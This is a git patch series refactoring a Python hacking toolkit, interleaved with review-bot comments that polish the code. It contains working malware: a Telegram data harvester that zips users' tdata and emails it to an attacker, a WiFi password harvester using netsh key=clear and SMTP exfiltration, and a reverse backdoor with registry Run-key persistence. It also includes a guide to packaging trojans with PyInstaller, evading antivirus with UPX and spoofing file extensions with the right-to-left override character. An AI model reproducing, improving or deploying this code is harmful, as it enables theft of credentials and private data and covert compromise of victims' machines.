From 2594c15bc43e9dc8e274b33c37a699197863219c Mon Sep 17 00:00:00 2001 From: Dhrumil Mistry <56185972+dmdhrumilmistry@users.noreply.github.com> Date: Sat, 11 Jun 2022 23:12:39 +0530 Subject: [PATCH 1/5] refactor modules update requirements --- .../__init__.py | 0 pyhtools/executable_generator/utils.py | 2 + .../TelegramRemoteCodeExecutor.py | 4 +- pyhtools/malwares/downloader/downloader.py | 5 - pyhtools/malwares/executables/generate.py | 3 - pyhtools/malwares/keylogger/keylogger.py | 2 - .../reverse_backdoor/HTTP/listener.py | 1 - .../malwares/reverse_backdoor/TCP/listener.py | 6 +- .../reverse_backdoor/TCP/reverse_backdoor.py | 11 +- .../telegram_data_harvester.py | 285 ++++++++++-------- .../wireless_profile_harvester.py | 129 ++++---- requirements.txt | 5 +- setup.py | 4 +- 13 files changed, 230 insertions(+), 227 deletions(-) rename pyhtools/{malwares/executables => executable_generator}/__init__.py (100%) create mode 100644 pyhtools/executable_generator/utils.py delete mode 100644 pyhtools/malwares/executables/generate.py diff --git a/pyhtools/malwares/executables/__init__.py b/pyhtools/executable_generator/__init__.py similarity index 100% rename from pyhtools/malwares/executables/__init__.py rename to pyhtools/executable_generator/__init__.py diff --git a/pyhtools/executable_generator/utils.py b/pyhtools/executable_generator/utils.py new file mode 100644 index 0000000..e060667 --- /dev/null +++ b/pyhtools/executable_generator/utils.py @@ -0,0 +1,2 @@ +from pyhtools.UI.colors import * + diff --git a/pyhtools/malwares/TelegramRemoteCodeExecutor/TelegramRemoteCodeExecutor.py b/pyhtools/malwares/TelegramRemoteCodeExecutor/TelegramRemoteCodeExecutor.py index 9f6cce7..df5c501 100644 --- a/pyhtools/malwares/TelegramRemoteCodeExecutor/TelegramRemoteCodeExecutor.py +++ b/pyhtools/malwares/TelegramRemoteCodeExecutor/TelegramRemoteCodeExecutor.py 
@@ -3,13 +3,13 @@ from subprocess import check_output -# root_dir = os.path.dirname(__file__) +# set API_KEY and CHAT_ID before starting bot API_KEY = 'your_bot_key/token' CHAT_ID = 0 # int - attacker's user id # to find user id, start the bot, and message this bot with /start -# password = 'password' // password is reserved for future work +# password = 'password' # reserved for future idea regarding authentication help_message = ''' Remote Code Executor BOT Written by Dhrumil Mistry diff --git a/pyhtools/malwares/downloader/downloader.py b/pyhtools/malwares/downloader/downloader.py index a8701c8..f1f29b2 100644 --- a/pyhtools/malwares/downloader/downloader.py +++ b/pyhtools/malwares/downloader/downloader.py @@ -1,4 +1,3 @@ -#!usr/bin/env python import requests def download(url:str)->bool: @@ -17,7 +16,3 @@ def download(url:str)->bool: except Exception as e: print('[-] Exception : ', e) return False - - -url = 'https://upload.wikimedia.org/wikipedia/commons/thumb/4/48/Ludwig_Guttmann2.jpg/800px-Ludwig_Guttmann2.jpg' -download(url) \ No newline at end of file diff --git a/pyhtools/malwares/executables/generate.py b/pyhtools/malwares/executables/generate.py deleted file mode 100644 index 438f62b..0000000 --- a/pyhtools/malwares/executables/generate.py +++ /dev/null @@ -1,3 +0,0 @@ -#!usr/bin/env python3 - -# TODO: Create functions to generate executables using payloads/malwares/ransomwares \ No newline at end of file diff --git a/pyhtools/malwares/keylogger/keylogger.py b/pyhtools/malwares/keylogger/keylogger.py index 87a91a0..b9cb6df 100644 --- a/pyhtools/malwares/keylogger/keylogger.py +++ b/pyhtools/malwares/keylogger/keylogger.py @@ -1,5 +1,3 @@ -#!usr/bin/env python3 -from types import MemberDescriptorType import pynput, threading, subprocess, smtplib class KeyLogger: diff --git a/pyhtools/malwares/reverse_backdoor/HTTP/listener.py b/pyhtools/malwares/reverse_backdoor/HTTP/listener.py index bc92c09..1619d38 100644 
--- a/pyhtools/malwares/reverse_backdoor/HTTP/listener.py +++ b/pyhtools/malwares/reverse_backdoor/HTTP/listener.py @@ -1,4 +1,3 @@ -from sys import stderr from http.server import BaseHTTPRequestHandler, HTTPServer diff --git a/pyhtools/malwares/reverse_backdoor/TCP/listener.py b/pyhtools/malwares/reverse_backdoor/TCP/listener.py index 40e7d88..c63c966 100644 --- a/pyhtools/malwares/reverse_backdoor/TCP/listener.py +++ b/pyhtools/malwares/reverse_backdoor/TCP/listener.py @@ -151,13 +151,13 @@ def run(self): except IndexError: print('[!] Cannot Accept empty command.') - # except Exception as e: - # print('[-] Listener Exception : ', e) + except Exception as e: + print('[-] Listener Exception : ', e) if __name__ == '__main__': try: - listener = Listener('192.168.0.199',8082) + listener = Listener('127.0.0.1',4444) listener.run() except Exception as e: print('[-] Exception : ',e) \ No newline at end of file diff --git a/pyhtools/malwares/reverse_backdoor/TCP/reverse_backdoor.py b/pyhtools/malwares/reverse_backdoor/TCP/reverse_backdoor.py index 2fee01d..8ce1638 100644 --- a/pyhtools/malwares/reverse_backdoor/TCP/reverse_backdoor.py +++ b/pyhtools/malwares/reverse_backdoor/TCP/reverse_backdoor.py @@ -1,4 +1,3 @@ -#!usr/bin/env python3 import socket import subprocess import json 
@@ -26,20 +25,18 @@ def __init__(self, ip:str, port:int)->None: self.connect_to_listener() - def create_persistence(self): + def create_persistence(self, backdoor_name:str='MyBackdoor.exe'): ''' description: tries to connect to user when machine restarts. params: None returns: None ''' if os.name == 'nt': - # print('inside persistence if.') # TODO: Change MyBackdoor to something less suspectful before creating exe - backdoor_file_path = os.environ['appdata'] + '\\MyBackdoor.exe' + backdoor_file_path = f'{os.environ["appdata"]}\\{backdoor_name}' if not os.path.exists(backdoor_file_path): - # print('inside if if.') shutil.copy(sys.executable, backdoor_file_path) - subprocess.call(f'reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MyBackdoor /t REG_SZ /d "{backdoor_file_path}"') + subprocess.call(f'reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v {backdoor_name.removesuffix(".exe")} /t REG_SZ /d "{backdoor_file_path}"') def connect_to_listener(self): @@ -209,7 +206,7 @@ def run(self): if __name__ == '__main__': try : - backdoor = ReverseBackdoor(ip='192.168.0.199', port=8082) + backdoor = ReverseBackdoor(ip='127.0.0.1', port=4444) backdoor.run() except Exception as e: print('Exception :',e) diff --git a/pyhtools/malwares/telegram_data_harvester/telegram_data_harvester.py b/pyhtools/malwares/telegram_data_harvester/telegram_data_harvester.py index bc4e70c..5123331 100644 --- a/pyhtools/malwares/telegram_data_harvester/telegram_data_harvester.py +++ b/pyhtools/malwares/telegram_data_harvester/telegram_data_harvester.py 
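Review bot: The docstring of `create_persistence` still reads `params: None` although the signature now takes `backdoor_name:str='MyBackdoor.exe'`, so the documentation contradicts the code directly below it; change it to `params: backdoor_name (str) - file name of the copied executable, default 'MyBackdoor.exe'`. The new f-string `f'reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ...'` contains `\S`, `\M`, `\W`, `\C` and `\R`, which Python treats as invalid escape sequences (DeprecationWarning today, SyntaxWarning from 3.12) and only keeps the backslashes by accident; a raw f-string `rf'...'` states the intent. The method is fully inside the hunk, but the enclosing `ReverseBackdoor` class starts outside it.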
@@ -1,138 +1,155 @@ -import time, os, psutil, shutil, smtplib, tempfile, subprocess +import time +import os +import psutil +import shutil +import smtplib +import tempfile +import subprocess from email.mime.multipart import MIMEMultipart from email.mime.base import MIMEBase from email import encoders -# start timer -# start_time = time.time() - -# move current location to temp directory -temp_path = tempfile.gettempdir() -os.chdir(temp_path) - -# create list to save tdata paths found -tdata_paths = [] - - -def find_tdata_in(path): - ''' - description: find tdata in specific location - ''' - tdata_path = None - for root, dirs, files in os.walk(path): - for dir in dirs: - if 'telegram' in dir.lower(): - telegram_path = os.path.join(root, dir) - - tdata_path = os.path.join(telegram_path, 'tdata') - if os.path.isdir(tdata_path) and tdata_path not in tdata_paths: - tdata_paths.append(tdata_path) - - -def terminate_td(): - ''' - description: kills Telegram processes if running - ''' - if os.name == 'nt': - import wmi - f = wmi.WMI() - for process in f.Win32_Process(): - if 'telegram' in process.name.lower(): - process.Terminate() - else: - processes = subprocess.Popen('ps -A', shell=True, stdout=subprocess.PIPE) - output, error = processes.communicate() - - for line in output.splitlines(): - if 'telegram' in str(line).lower(): - pid = int(line.split(None, 1)[0]) - os.kill(pid, 9) - - -def send_zip(zip_path): - ''' - description: report tdata zip to the attacker - ''' - try: - DESTINATION_ARCHIVE_NAME = zip_path - SUBJECT = "Telegram Data {}".format(zip_path) - # separate emails using comma - RECIPIENTS = "white.tester.test@gmail.com" - - server = "smtp.gmail.com" - port = 587 - username = "yourgmailid" - password = "yourAppPassword" - sender = username - - msg = MIMEMultipart() - msg['Subject'] = SUBJECT - msg['From'] = sender - msg['To'] = RECIPIENTS - - part = MIMEBase("application", "octet-stream") - part.set_payload(open(DESTINATION_ARCHIVE_NAME, "rb").read()) - 
encoders.encode_base64(part) - part.add_header("Content-Disposition", "attachment; filename=\"%s\"" % (DESTINATION_ARCHIVE_NAME)) - msg.attach(part) - - smtp = smtplib.SMTP(server, port) - smtp.ehlo() - smtp.starttls() - smtp.ehlo() - smtp.login(username,password) - smtp.sendmail(sender, RECIPIENTS, msg.as_string()) - smtp.close() - - except Exception as e: - # print(e) - pass - - - -def create_archive_and_send_mail(source_path:str, dest_path:str): - ''' - desciption: creates archive and send email - ''' - os.chdir(dest_path) - terminate_td() - zip_name = 'tdata_zip_file_{}'.format(time.time()) - shutil.make_archive(zip_name,'zip', dest_path, source_path) - zip_path = os.path.join(dest_path, zip_name + '.zip') - send_zip(zip_path) - os.chdir(dest_path) - os.remove(zip_path) - -def search_in_paritions(): - ''' - description: search for telegram data in mounted partitions - ''' - partitions = psutil.disk_partitions() - for partition in partitions: - find_tdata_in(partition.mountpoint) - - -# target os specific locations to search for tdata -if os.name == 'nt': - probable_installation_paths = [ os.environ['APPDATA'], - os.environ['ALLUSERSPROFILE'], - os.environ['LOCALAPPDATA'], - os.environ['PROGRAMW6432'], - os.environ['PROGRAMFILES(X86)'], - ] - - -else: - probable_installation_paths = [os.environ['HOME'], - ] - -# first search in probable installation locations -for path in probable_installation_paths: - find_tdata_in(path) - -terminate_td() -search_in_paritions() -for tpath in tdata_paths: - create_archive_and_send_mail(source_path=tpath, dest_path=temp_path) - -# print('process Completed in ', time.time() - start_time) \ No newline at end of file + +class TelegramHarvester: + def __init__(self, sender_email: str, sender_passwd: str, server: str = "smtp.gmail.com", port: int = 587, receivers: list[str] = None): + # move current location to temp directory + self.temp_path = tempfile.gettempdir() + os.chdir(self.temp_path) + + # create list to save tdata paths 
found + self.tdata_paths = [] + + # email configurations + self.sender_email = sender_email + self.sender_passwd = sender_passwd + self.server = server + self.port = port + self.receivers = receivers + + def find_tdata_in(self, path): + ''' + description: find tdata in specific location + ''' + tdata_path = None + for root, dirs, files in os.walk(path): + for dir in dirs: + if 'telegram' in dir.lower(): + telegram_path = os.path.join(root, dir) + + tdata_path = os.path.join(telegram_path, 'tdata') + if os.path.isdir(tdata_path) and tdata_path not in self.tdata_paths: + self.tdata_paths.append(tdata_path) + + def terminate_td(self): + ''' + description: kills Telegram processes if running + ''' + if os.name == 'nt': + import wmi + f = wmi.WMI() + for process in f.Win32_Process(): + if 'telegram' in process.name.lower(): + process.Terminate() + else: + processes = subprocess.Popen( + 'ps -A', shell=True, stdout=subprocess.PIPE) + output, error = processes.communicate() + + for line in output.splitlines(): + if 'telegram' in str(line).lower(): + pid = int(line.split(None, 1)[0]) + os.kill(pid, 9) + + def send_zip(self, zip_path): + ''' + description: report tdata zip to the attacker + ''' + try: + DESTINATION_ARCHIVE_NAME = zip_path + SUBJECT = "Telegram Data {}".format(zip_path) + + # separate emails using comma + RECIPIENTS = ','.join(self.receivers) + + msg = MIMEMultipart() + msg['Subject'] = SUBJECT + msg['From'] = self.sender_email + msg['To'] = RECIPIENTS + + part = MIMEBase("application", "octet-stream") + part.set_payload(open(DESTINATION_ARCHIVE_NAME, "rb").read()) + encoders.encode_base64(part) + part.add_header("Content-Disposition", + "attachment; filename=\"%s\"" % (DESTINATION_ARCHIVE_NAME)) + msg.attach(part) + + smtp = smtplib.SMTP(self.server, self.port) + smtp.ehlo() + smtp.starttls() + smtp.ehlo() + smtp.login(self.sender_email, self.sender_passwd) + smtp.sendmail(self.sender_email, RECIPIENTS, msg.as_string()) + smtp.close() + + return True + + # 
ignore any exceptions occurred + except Exception as e: + # print(e) + return False + + def create_archive_and_send_mail(self, source_path: str, dest_path: str): + ''' + desciption: creates archive and send email + ''' + os.chdir(dest_path) + self.terminate_td() + zip_name = 'tdata_zip_file_{}'.format(time.time()) + shutil.make_archive(zip_name, 'zip', dest_path, source_path) + zip_path = os.path.join(dest_path, zip_name + '.zip') + self.send_zip(zip_path) + os.chdir(dest_path) + os.remove(zip_path) + + def search_in_paritions(self,): + ''' + description: search for telegram data in mounted partitions + ''' + partitions = psutil.disk_partitions() + for partition in partitions: + self.find_tdata_in(partition.mountpoint) + + def start(self): + # target os specific locations to search for tdata + if os.name == 'nt': + probable_installation_paths = [ + os.environ['APPDATA'], + os.environ['ALLUSERSPROFILE'], + os.environ['LOCALAPPDATA'], + os.environ['PROGRAMW6432'], + os.environ['PROGRAMFILES(X86)'], + ] + + else: + probable_installation_paths = [ + os.environ['HOME'], + ] + + # first search in probable installation locations + for path in probable_installation_paths: + self.find_tdata_in(path) + + self.terminate_td() + self.search_in_paritions() + for tpath in self.tdata_paths: + self.create_archive_and_send_mail( + source_path=tpath, dest_path=self.temp_path) + +if __name__ == '__main__': + tdata_harvester = TelegramHarvester( + sender_email='dummy_email', # dummy email to send collected data + sender_passwd='dummy_email_passwd', # dummy email account password for authentication + server='smtp.gmail.com', # smtp email server domain + port=587, # smtp server port + receivers='attacker_email', # email where harvested data will sent + ) \ No newline at end of file diff --git a/pyhtools/malwares/wireless_password_harvester/wireless_profile_harvester.py b/pyhtools/malwares/wireless_password_harvester/wireless_profile_harvester.py index bf5d604..fa8856c 100644 
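Review bot: In `send_zip` the new code keeps `part.set_payload(open(DESTINATION_ARCHIVE_NAME, "rb").read())`, which leaves the file handle to the garbage collector, and the `except Exception as e:` binds an `e` that is never used; write `with open(DESTINATION_ARCHIVE_NAME, "rb") as fh: part.set_payload(fh.read())` and `except Exception:`. The new `TelegramHarvester` class and its `__init__` and `start` methods carry no docstring at all; a class docstring such as `"""Locates Telegram Desktop tdata directories, archives each one and emails the archive via the configured SMTP account."""` would make the purpose readable without the method bodies. `__init__` also calls `os.chdir(self.temp_path)`, so merely constructing the object changes the process working directory; that side effect belongs in `start()` next to the other ones, and `tempfile.gettempdir()` can still be stored in `__init__`.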
--- a/pyhtools/malwares/wireless_password_harvester/wireless_profile_harvester.py
+++ b/pyhtools/malwares/wireless_password_harvester/wireless_profile_harvester.py
@@ -3,84 +3,77 @@ import re -def send_mail(mail, password, message)->bool: - ''' - sends email from mail to itself. - params: mail, password, message -> str - retuns bool - ''' - try: - server = smtplib.SMTP('smtp.gmail.com', 587) - # print('[+] Connected to Google Server.') - server.starttls() - # print('[*] TLS started successfully.') - server.login(mail, password) - # print('[*] Logged in successfully.') - server.sendmail(mail, mail, message) - # print('[*] Data has been sent.') - server.quit() - # print('[*] Server Connection has been closed.') - return True - except smtplib.SMTPException as e: - # print('[-] Exception : ', e) - return False +class WiFiPasswordHarvester: + def __init__(self, email: str, passwd: str, smtp_server: str = 'smtp.gmail.com', port: int = 587) -> None: + # smtp conf + self.smtp_server = smtp_server + self.smtp_port = port + # login details + self.email = email + self.passwd = passwd -def get_credentials()->str: - ''' - returns wifi credentials as str - ''' - def get_username(): + def send_mail(self, message: str) -> bool: ''' - returns username if detected else returns "Unkown User" + sends email from mail to itself. 
+ params: mail, password, message -> str + retuns bool ''' - username = subprocess.check_output('whoami', shell=True).decode() - if username: - return username - else: - return 'Unknown User' + try: + server = smtplib.SMTP(self.smtp_server, self.smtp_port) + server.starttls() + server.login(self.email, self.password) + server.sendmail(self.email, self.email, message) + server.quit() + return True + except smtplib.SMTPException as e: + return False + def get_credentials(self) -> str: + ''' + returns wifi credentials as str + ''' + def get_username(): + ''' + returns username if detected else returns "Unkown User" + ''' + username = subprocess.check_output('whoami', shell=True).decode() + if username: + return username + else: + return 'Unknown User' - command = 'netsh wlan show profiles' - networks = subprocess.check_output(command, shell=True).decode() - network_names = re.findall(r'(?:Profile\s*:\s)(.*)', networks) + command = 'netsh wlan show profiles' + networks = subprocess.check_output(command, shell=True).decode() + network_names = re.findall(r'(?:Profile\s*:\s)(.*)', networks) - overall_nw_data = f'Subject: Received Credentials from {get_username()} \n' - ssid_passwds = 'SSID : Password\n' - for network_name in network_names: - if 'QuantumRegion' in network_name: - continue + overall_nw_data = f'Subject: Received Credentials from {get_username()} \n' + ssid_passwds = 'SSID : Password\n' + for network_name in network_names: + if 'QuantumRegion' in network_name: + continue - network_name = network_name.replace('\r','') - command = 'netsh wlan show profile "' + (network_name) + '" key=clear' - - nw_info = subprocess.check_output(command, shell=True).decode() - overall_nw_data += nw_info - - passwd_res = re.search(r'(?:Key\sContent\s*:\s)(.*)', nw_info) - passwd = passwd_res.group(1) + network_name = network_name.replace('\r', '') + command = 'netsh wlan show profile "' + \ + (network_name) + '" key=clear' - ssid_passwds += f'{network_name} : {passwd}\n' + 
nw_info = subprocess.check_output(command, shell=True).decode() + overall_nw_data += nw_info - overall_nw_data += ssid_passwds - # print(overall_nw_data) - # print(ssid_passwds) - return overall_nw_data + passwd_res = re.search(r'(?:Key\sContent\s*:\s)(.*)', nw_info) + passwd = passwd_res.group(1) + ssid_passwds += f'{network_name} : {passwd}\n' -mail = "your_email@gmail.com" -passwd = "your_password" + overall_nw_data += ssid_passwds + return overall_nw_data -credentials = get_credentials() -# print(credentials) -if credentials: - # print('[*] Recieved Credentials.') - if send_mail(mail=mail, password=passwd, message=credentials): - print('[*] Process Completed Successfully') - pass - else: - # print('[-] Process Interuppted!') - pass -else: - # print('[-] Failed to get credentials.') - pass \ No newline at end of file + def start(self): + credentials = self.get_credentials() + if credentials: + if self.send_mail(message=credentials): + print('[*] Process Completed Successfully') + return True + else: + print('[-] Process Failed.') + return False diff --git a/requirements.txt b/requirements.txt index 9929f28..b9494c4 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,6 +1,7 @@ beautifulsoup4>=4.9.3 colorama>=0.4.4 #netfilterqueue (for linux devices only): sudo pip3 install --upgrade -U git+https://github.com/kti/python-netfilterqueue +nuitka kamene>=0.32 scapy>=2.4.5 psutil>=5.8.0 @@ -8,4 +9,6 @@ prettytable>=2.1.0 pynput>=1.7.3 pyfiglet>=0.8.post1 pytelegrambotapi>=4.0.1 -requests>=2.25.1 \ No newline at end of file +pyinstaller +requests>=2.25.1 +# wmi # for windows process management \ No newline at end of file diff --git a/setup.py b/setup.py index a2b1db9..a727922 100644 --- a/setup.py +++ b/setup.py @@ -21,7 +21,8 @@ install_requires=[ 'beautifulsoup4', 'colorama', - # 'netfilterqueue', + # 'netfilterqueue', # (for linux devices only): sudo pip3 install -U git+https://github.com/kti/python-netfilterqueue + 'nuitka', 'kamene', 'scapy', 'psutil', 
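Review bot: The docstring of `send_mail` still lists `params: mail, password, message -> str` although the method now takes only `message` and reads the SMTP settings from `self`, and `retuns` is misspelled; replace it with `sends message from the configured account to itself. params: message (str). returns: bool`. In the same method `except smtplib.SMTPException as e:` binds an `e` that is never read, so `except smtplib.SMTPException:` is enough. `start` has no docstring either; `'''collects the profile report and mails it; returns True when the mail was sent, else False'''` matches the two return paths it has.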
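Review bot: `nuitka` and `pyinstaller` are added to requirements.txt without any version bound while every other entry in the file carries a `>=` floor, and the same two unbounded names go into `install_requires` in the setup.py hunks `@@ -21,7 +21,8 @@` and `@@ -29,6 +30,7 @@`. An unbounded specifier resolves to whatever the index serves at install time, so installs are not reproducible and a breaking or compromised release of either build tool is pulled in silently; give both a floor consistent with the rest of the file, e.g. `nuitka>=<version used for testing>` and `pyinstaller>=<version used for testing>`, in both files. The new trailing comment `# wmi # for windows process management` documents a dependency pip will never install, which is worth stating explicitly in the comment so readers do not assume it is satisfied.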
@@ -29,6 +30,7 @@ 'pynput', 'pyfiglet', 'pytelegrambotapi', + 'pyinstaller', 'requests', ], classifiers=[ From 47a75166932586261989b98e433b4dc7ffc6bbca Mon Sep 17 00:00:00 2001 
From: Dhrumil Mistry <56185972+dmdhrumilmistry@users.noreply.github.com> Date: Mon, 13 Jun 2022 02:16:13 +0530 Subject: [PATCH 2/5] refactor project create classes for evil files create examples and HowTo md files --- .../Malwares/CreateTrojanPackage.md | 50 +++++++------ .../Malwares/ReverseBackdoor-HTTP.md | 16 ++++- .../Malwares/ReverseBackdoor-TCP.md | 24 ++++--- HowTo/Malwares/SendEmail.md | 22 ++++++ .../Malwares/TelegramDataHarvester.md | 2 + .../Malwares/TelegramRemoteCodeExecutor.md | 5 +- HowTo/Malwares/WirelessProfileHarvester.md | 7 ++ examples/Malwares/TelegramBackdoor.py | 14 ++++ examples/Malwares/TelegramDataHarvester.py | 12 ++++ .../Malwares/key_logger.py | 2 +- examples/Malwares/wifi-password-harvester.py | 13 ++++ examples/Ransomwares/dmsec_decrypter.py | 14 ++++ examples/Ransomwares/dmsec_encrypter.py | 21 ++++++ examples/Worms/DirClonerWorm.py | 20 ++++++ pyhtools/UI/functions.py | 8 +-- .../malwares}/__init__.py | 0 .../credential_harvester}/__init__.py | 0 .../credential_harvester.py | 59 +++++++++++++++ .../malwares/keylogger}/__init__.py | 0 .../malwares/keylogger/keylogger.py | 0 .../reverse_backdoor/HTTP}/__init__.py | 0 .../reverse_backdoor/HTTP/backdoor.py | 0 .../reverse_backdoor/HTTP/listener.py | 0 .../reverse_backdoor/TCP}/__init__.py | 0 .../malwares/reverse_backdoor/TCP/listener.py | 0 .../reverse_backdoor/TCP/reverse_backdoor.py | 0 .../malwares/reverse_backdoor}/__init__.py | 0 .../telegram_data_harvester}/__init__.py | 0 .../telegram_data_harvester/harvester.py} | 9 --- .../TelegramRemoteCodeExecutor.py | 43 ++++++----- .../__init__.py | 0 pyhtools/evil_files/malwares/utils.py | 36 ++++++++++ .../wireless_password_harvester}/__init__.py | 0 .../wireless_password_harvester/harvester.py} | 24 ++----- .../ransomwares}/__init__.py | 0 .../ransomwares/dmsec/HowToUse.md | 0 .../ransomwares/dmsec}/__init__.py | 0 .../ransomwares/dmsec/decrypter.py | 31 ++------ .../ransomwares/dmsec/encrypter.py} | 46 ++---------- 
.../worms}/__init__.py | 0 pyhtools/{ => evil_files}/worms/dir_cloner.py | 19 +---- pyhtools/executable_generator/generator.py | 50 +++++++++++++ pyhtools/executable_generator/utils.py | 2 - .../credential_harvester.py | 72 ------------------- pyhtools/malwares/downloader/downloader.py | 18 ----- pyhtools/malwares/send_mail/how to.txt | 6 -- pyhtools/malwares/send_mail/send_mail.py | 33 --------- .../wireless_password_harvester/HowToUse.txt | 4 -- pyhtools/ransomwares/__init__.py | 0 pyhtools/ransomwares/dmsec/__init__.py | 0 pyhtools/worms/__init__.py | 0 51 files changed, 373 insertions(+), 309 deletions(-) rename pyhtools/malwares/Trojans/HowToCreateTrojanPackage.md => HowTo/Malwares/CreateTrojanPackage.md (59%) rename pyhtools/malwares/reverse_backdoor/HTTP/HowToUse.md => HowTo/Malwares/ReverseBackdoor-HTTP.md (97%) rename pyhtools/malwares/reverse_backdoor/TCP/HowToUse.md => HowTo/Malwares/ReverseBackdoor-TCP.md (71%) create mode 100644 HowTo/Malwares/SendEmail.md rename pyhtools/malwares/telegram_data_harvester/HowToUse.md => HowTo/Malwares/TelegramDataHarvester.md (99%) rename pyhtools/malwares/TelegramRemoteCodeExecutor/HowToUse.md => HowTo/Malwares/TelegramRemoteCodeExecutor.md (96%) create mode 100644 HowTo/Malwares/WirelessProfileHarvester.md create mode 100644 examples/Malwares/TelegramBackdoor.py create mode 100644 examples/Malwares/TelegramDataHarvester.py rename pyhtools/malwares/keylogger/dlogs.py => examples/Malwares/key_logger.py (64%) create mode 100644 examples/Malwares/wifi-password-harvester.py create mode 100644 examples/Ransomwares/dmsec_decrypter.py create mode 100644 examples/Ransomwares/dmsec_encrypter.py create mode 100644 examples/Worms/DirClonerWorm.py rename pyhtools/{malwares/TelegramRemoteCodeExecutor => evil_files/malwares}/__init__.py (100%) rename pyhtools/{malwares/Trojans => evil_files/malwares/credential_harvester}/__init__.py (100%) create mode 100644 pyhtools/evil_files/malwares/credential_harvester/credential_harvester.py 
rename pyhtools/{malwares => evil_files/malwares/keylogger}/__init__.py (100%) rename pyhtools/{ => evil_files}/malwares/keylogger/keylogger.py (100%) rename pyhtools/{malwares/credential_harvester => evil_files/malwares/reverse_backdoor/HTTP}/__init__.py (100%) rename pyhtools/{ => evil_files}/malwares/reverse_backdoor/HTTP/backdoor.py (100%) rename pyhtools/{ => evil_files}/malwares/reverse_backdoor/HTTP/listener.py (100%) rename pyhtools/{malwares/downloader => evil_files/malwares/reverse_backdoor/TCP}/__init__.py (100%) rename pyhtools/{ => evil_files}/malwares/reverse_backdoor/TCP/listener.py (100%) rename pyhtools/{ => evil_files}/malwares/reverse_backdoor/TCP/reverse_backdoor.py (100%) rename pyhtools/{malwares/keylogger => evil_files/malwares/reverse_backdoor}/__init__.py (100%) rename pyhtools/{malwares/reverse_backdoor/HTTP => evil_files/malwares/telegram_data_harvester}/__init__.py (100%) rename pyhtools/{malwares/telegram_data_harvester/telegram_data_harvester.py => evil_files/malwares/telegram_data_harvester/harvester.py} (92%) rename pyhtools/{malwares/TelegramRemoteCodeExecutor => evil_files/malwares/telegram_remote_code_executor}/TelegramRemoteCodeExecutor.py (80%) rename pyhtools/{malwares/reverse_backdoor/TCP => evil_files/malwares/telegram_remote_code_executor}/__init__.py (100%) create mode 100644 pyhtools/evil_files/malwares/utils.py rename pyhtools/{malwares/reverse_backdoor => evil_files/malwares/wireless_password_harvester}/__init__.py (100%) rename pyhtools/{malwares/wireless_password_harvester/wireless_profile_harvester.py => evil_files/malwares/wireless_password_harvester/harvester.py} (74%) rename pyhtools/{malwares/send_mail => evil_files/ransomwares}/__init__.py (100%) rename pyhtools/{ => evil_files}/ransomwares/dmsec/HowToUse.md (100%) rename pyhtools/{malwares/telegram_data_harvester => evil_files/ransomwares/dmsec}/__init__.py (100%) rename pyhtools/{ => evil_files}/ransomwares/dmsec/decrypter.py (78%) rename 
pyhtools/{ransomwares/dmsec/dmsec_ransomeware.py => evil_files/ransomwares/dmsec/encrypter.py} (56%) rename pyhtools/{malwares/wireless_password_harvester => evil_files/worms}/__init__.py (100%) rename pyhtools/{ => evil_files}/worms/dir_cloner.py (89%) create mode 100644 pyhtools/executable_generator/generator.py delete mode 100644 pyhtools/executable_generator/utils.py delete mode 100644 pyhtools/malwares/credential_harvester/credential_harvester.py delete mode 100644 pyhtools/malwares/downloader/downloader.py delete mode 100644 pyhtools/malwares/send_mail/how to.txt delete mode 100644 pyhtools/malwares/send_mail/send_mail.py delete mode 100644 pyhtools/malwares/wireless_password_harvester/HowToUse.txt delete mode 100644 pyhtools/ransomwares/__init__.py delete mode 100644 pyhtools/ransomwares/dmsec/__init__.py delete mode 100644 pyhtools/worms/__init__.py diff --git a/pyhtools/malwares/Trojans/HowToCreateTrojanPackage.md b/HowTo/Malwares/CreateTrojanPackage.md similarity index 59% rename from pyhtools/malwares/Trojans/HowToCreateTrojanPackage.md rename to HowTo/Malwares/CreateTrojanPackage.md index 16033b5..a78b68b 100644 --- a/pyhtools/malwares/Trojans/HowToCreateTrojanPackage.md +++ b/HowTo/Malwares/CreateTrojanPackage.md 
@@ -1,37 +1,44 @@ -# Packaging Trojans with any file. - - ## Using App Data +# Packaging Trojans with any file + +## Using App Data + +### Steps - ### Steps - Install Pyinstaller - Downloading Icon : - - Download Icon from [IconFinder](https://iconfinder.com/) - - set filters to free and choose high resolution. - - download icon + - Download Icon from [IconFinder](https://iconfinder.com/) + - set filters to free and choose high resolution. + - download icon - Changing downloaded png to ico - - Visit [ICO convert](https://icoconvert.com/) or [OnlineConvert.com](https://image.online-convert.com/convert-to-ico) - - Upload image - - choose desired settings - - convert and download ico file + - Visit [ICO convert](https://icoconvert.com/) or [OnlineConvert.com](https://image.online-convert.com/convert-to-ico) + - Upload image + - choose desired settings + - convert and download ico file - If using requests use 2.5.1 - ``` - $ pyinstaller --add-data "path_to_front_file;." --icon "full_icon_path" --one-file --noconsole -n "name_of_output_file" "path_to_reverse_tcp.py" + + ```bash + pyinstaller --add-data "path_to_front_file;." --icon "full_icon_path" --one-file --noconsole -n "name_of_output_file" "path_to_reverse_tcp.py" ``` ### Bypassing AV using UPX + - Download [UPX](https://github.com/upx/upx/releases/tag/v3.96) -- Extract files +- Extract files - Use UPX to compress pyinstaller generated executable - Syntax: - ``` - $ ./upx "full_path_of_executable" -o "full_path_of_compressed_executable" + + ```bash + ./upx "full_path_of_executable" -o "full_path_of_compressed_executable" ``` ### Spoofing File Type + - Copy Right to left override character (U+202E). copy from below or from [unicode-explorer website](https://unicode-explorer.com/c/202E) -``` -‮ -``` + + ```string + ‮ + ``` + - file_name-`(type_everything_in_reverse_order)` and paste copied character after `-`. - eg : sample_pdf-`fdp.exe` 
